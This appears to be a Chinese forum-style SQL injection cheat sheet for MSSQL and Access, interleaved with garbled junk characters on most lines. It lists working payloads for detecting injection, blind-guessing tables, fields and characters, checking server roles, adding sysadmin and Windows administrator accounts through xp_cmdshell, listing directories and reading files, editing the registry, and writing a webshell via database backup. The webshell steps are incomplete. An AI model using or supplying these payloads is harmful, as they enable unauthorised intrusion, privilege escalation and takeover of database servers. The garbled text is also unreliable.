手工脚本注入
: B8 N: m9 v5 [" ^% c. E1.判断是否有注入;and 1=1 ;and 1=2 4 u5 ~5 @4 g! c( [/ T1 h. x) ^8 J
8 b# t6 Z Y$ W" |
2.初步判断是否是mssql ;and user>0
1 L( O! t1 t# M% D" d
A$ ]7 i/ m" ^5 _! W9 ~/ u$ V3.注入参数是字符'and [查询条件] and ''='
( I: f; t& I; |! U) Q. ~+ u; i6 s
$ B# Z! j9 g( u# N: R9 S4.搜索时没过滤参数的'and [查询条件] and '%25'='
1 H2 r3 o! y; n1 z; L* d3 C+ A- U3 b. k, w% o
5.判断数据库系统 6 u" A" I4 P9 k3 @4 n
;and (select count(*) from sysobjects)>0 mssql 8 o+ ?4 r5 k" Q6 ]5 P
;and (select count(*) from msysobjects)>0 access 6 Q: m: t' |& j6 L9 O& b6 s6 S
. ~; [) A& a" y, n+ O7 @# p6.猜数据库 ;and (select Count(*) from [数据库名])>0
4 J5 k* T: q3 q
. a0 Q% L( s, ^) q' D7.猜字段 ;and (select Count(字段名) from 数据库名)>0 6 ?6 M4 R2 a# N! Y- r$ C& M
& \' m# n. X4 |1 ]- M
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
9 L7 X$ f: T' d1 D3 L: t2 h
& a# [' x" `% k. h/ }9.(1)猜字段的ascii值(access) 8 R4 b# p. S3 W( o4 a" {- t
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 8 z3 M7 t- F6 I/ ^& Y
$ i2 V! @4 s* m( i/ `, ^. a" X(2)猜字段的ascii值(mssql)
* R! n8 a# z+ Q4 c0 P/ E* P1 n- z6 B;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ! k; a/ q8 X* t- i5 O3 v/ e
4 y/ u F* l n8 g6 `6 N4 q10.测试权限结构(mssql)
, ]4 u/ x* {( _: u: _;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 0 m9 V: P+ C# k6 r7 V
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- , x8 g+ Q( s8 V5 G3 `
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- / E- _$ S4 M& y# v5 Q( u: A
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- * W- N! l+ `1 v, I* X* M4 w
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
3 _& S, }9 |/ W. N;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 1 j1 S! v; o1 ~% h+ o
;and 1=(select IS_MEMBER('db_owner'));--
, u2 ~# W% a, N! j5 I1 z. V% Q7 d( u* E
11.添加mssql和系统的帐户 2 E3 p$ p! y/ {
;exec master.dbo.sp_addlogin username;--
6 z, {4 h7 G5 b$ s a6 @
" [% |3 ]- L/ Y$ H: q, S;exec master.dbo.sp_password null,username,password;-- ( d' X8 v7 \( e4 S A
# w( S1 Y1 u( b5 j;exec master.dbo.sp_addsrvrolemember sysadmin username;--
2 r& R; L e7 V: C
+ L/ s. Q" c4 j" k;exec master.dbo.xp_cmdshell 'net user username password , I7 v# ^6 [# k: z2 a" K* ^- m
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- A" W/ r: }) h) z7 y) T7 x% [0 e
+ A& W3 P6 Y/ f, L4 f2 c8 v;exec master.dbo.xp_cmdshell 'net user username password /add';--
1 i( _" G$ j) m1 [/ t
+ _: Y* c/ ^% R1 H E;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
Y* C6 k q% u, v- ~6 ] c3 D# A; Z. N4 M
12.(1)遍历目录
/ l' T% L* C) U: L% x. I! I+ i
9 z, W4 L) G2 S8 Y1 x. t) O8 };create table dirs(paths varchar(100), id int)
6 H6 u* X6 j& g; C5 |;insert dirs exec master.dbo.xp_dirtree 'c:\' * ^2 U6 U/ D) ]! }& H1 E# a4 _- D2 X
;and (select top 1 paths from dirs)>0 2 _' R$ v3 T0 T2 s& E% A; l
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) * `. U2 t- b' f2 |( o5 P# _
* Y! A9 E2 `* e(2)遍历目录
: W5 i: |# R7 H/ h3 f;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
7 G- m8 U/ |5 l+ _" R' @' C* H5 H;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
2 g' y5 t2 _9 t' p;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
8 H _* b z; [. |" N `. y;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 + V V3 K& d" ?. _0 j% F+ q
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ; Z7 [; H- j- V6 \) J$ p
$ l1 y5 _( l7 K- y' n5 V13.mssql中的存储过程 0 b# a" [' s% R9 C
$ i' A7 F7 Q. h5 z5 W: Rxp_regenumvalues 注册表根键, 子键 ' k8 v* e' v4 h. }
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ' G. g! b% |9 E/ B0 U( v6 l* _# t
* u. a7 B( s. u) P5 Q; G+ } t4 O
xp_regread 根键,子键,键值名 5 T) |: c+ I& [9 E
;exec xp_regread
: v5 B8 u. ?. }% v' c# h. d'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 7 Y* F+ a! o& ?+ n6 Q2 m# d, d4 z9 d
7 R2 S( |7 U3 i* E
xp_regwrite 根键,子键, 值名, 值类型, 值
8 m1 c+ k3 F2 Z) F5 {# |值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
* q! x5 u& X5 z: ]9 K6 X8 f;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
& T( `$ Q8 F/ V* f2 S- e" U
& ~, d8 L ]% P' G$ u+ zxp_regdeletevalue 根键,子键,值名
; Z; ~1 y1 a' C! }7 t$ d
& ?# ~& Q$ Z# e, Wexec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
" o" e7 k) ]& n$ e1 U, a5 K7 L( m; ?
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
" k P! R+ n: l3 i# H% @# E* }% J8 L
14.mssql的backup创建webshell
$ p& `( D, ?; H m+ h! xuse model ) w% B/ _% L7 O) u0 R
create table cmd(str image);
, _) q+ ^& H4 Z6 kinsert into cmd(str) values (''); ' G# I$ Y( }% g/ C3 s
backup database model to disk='c:\l.asp'; 3 `/ l4 x9 }0 g2 l! B0 y5 `
+ B) O8 U4 J% e" @15.mssql内置函数
# c& @ c: ]4 v x;and (select @@version)>0 获得Windows的版本号
- x, Q# J g. S/ {/ _9 x9 q;and user_name()='dbo' 判断当前系统的连接用户是不是sa
$ c9 a' B$ e* z) \6 ~;and (select user_name())>0 爆当前系统的连接用户 4 J6 k. H: I. `; p2 K- [ Q# `
;and (select db_name())>0 得到当前连接的数据库 , a2 _ _0 U4 y3 k& Y
! u) D% j% G, l! e5 ^
16.简洁的webshell R. j8 \2 u% ], l% v {
7 }& F- q+ L4 g- ^3 M# S& B3 B# {use model ( v6 o5 Y- c2 I6 Z+ P
1 k9 O2 x' r" ?' j, ^2 n; N+ H5 Z
create table cmd(str image);
1 X$ W; E$ m- T. F, v e* ]4 \, l i8 j$ i# @0 _; ?( y; g
insert into cmd(str) values (''); 5 ]* ^' ], x; q7 i
" @) \" s1 Y; t' h! @' a
backup database model to disk='g:\wwwtest\l.asp'; : ?( L6 A: D7 t' s3 ~
3 L8 q6 @; w+ z) A, k |